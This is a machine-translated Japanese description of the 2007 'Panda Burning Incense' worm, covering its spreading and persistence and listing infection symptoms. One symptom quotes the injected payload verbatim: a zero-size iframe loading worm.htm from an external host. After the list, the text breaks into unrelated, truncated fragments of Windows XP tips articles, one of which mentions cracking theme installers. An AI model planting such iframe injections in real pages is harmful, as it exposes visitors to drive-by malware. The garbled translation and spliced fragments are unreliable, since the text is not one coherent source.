第三に、ウイルスの説明
実行後、ウイルスは自分自身をシステムディレクトリにコピーし、レジストリを変更しますブートエントリに設定し、各ドライブをトラバースし、自分自身をディスクのルートディレクトリに書き込み、Autorun.infファイルを追加して、ディスクが開かれたときにユーザがビリオンをアクティブにするようにします。その後、ウイルス本体はローカルファイル感染のためのスレッドを開き、LAN上の他のコンピュータをスキャンし、別のスレッドを開いてWebサイトに接続し、このトロイの木馬をダウンロードして悪質な攻撃を仕掛けます。
ファイル名:nvscv32.exe
ウイルス名:現在、すべてのウイルス対策ソフトウェアは強制終了できません(ウイルスサンプルを各ウイルス対策メーカーに報告しています)
中国の名前:(ニミア、パンダ焼香)< BR>ウイルスサイズ:68,570バイト
言語:Borland Delphi 6.0 - 7.0 パッキング方法:FSG 2.0 - > bart /xt
見つかった時間:2007.1.16
危険レベル:高い
4番目に、中毒現象
1:システムの各パーティションのルートディレクトリにsetup.exeファイルとautorun.infファイルがあります(AディスクとBディスクは感染していません)。
2:隠しファイルを表示するように[フォルダオプション]を手動で変更することはできません。
3:Desktop_iniの隠しファイルが各感染フォルダーに表示され、内容は次のような感染日です。2007-1-16
4:コンピューター上のすべてのスクリプトファイルが追加されます。次のコード:< iframe src = http://www.krvkr.com/worm.htm width =” 0” height =” 0”>< /iframe>
5:中毒後のマシン一般的なウイルス対策ソフトウェアやファイアウォールを開いて正常に実行することはできません。
6:タスクマネージャ、SREng.exe、その他のツールは正常に使用できません。
7:無条件発信パケット。LAN内の他のマシンに接続されています。
Windows XPシステムをより合理的にするのが最も簡単です。サブリージョン内時間の経過とともに、ますます多くのインストーラとファイルが利用可能になるにつれて、それは不十分なディスクスペースまたは断
のように簡単にドレスアップし、続いてマウスとテーマをインストールします。プロンプトの指示に従ってください。テーマのインストールをクラックする必要があることも注目に値しますクラックの後、あなたは再起動し
最近、Windows XP専用に最適化された最適化ツールであるTweak-XP Proが、仮想デスクトップの追加、壁紙の自動置換、広告のブロック、ポップアップのブロック、キャッシュの最
でホームデジタルムービーを作成する今、個人的なムービー処理に対する 贅沢な欲求は、もはや普通のユーザーにとって遠い夢ではありません。 Windows XPでは、強化されたデジタルメディア機能により、家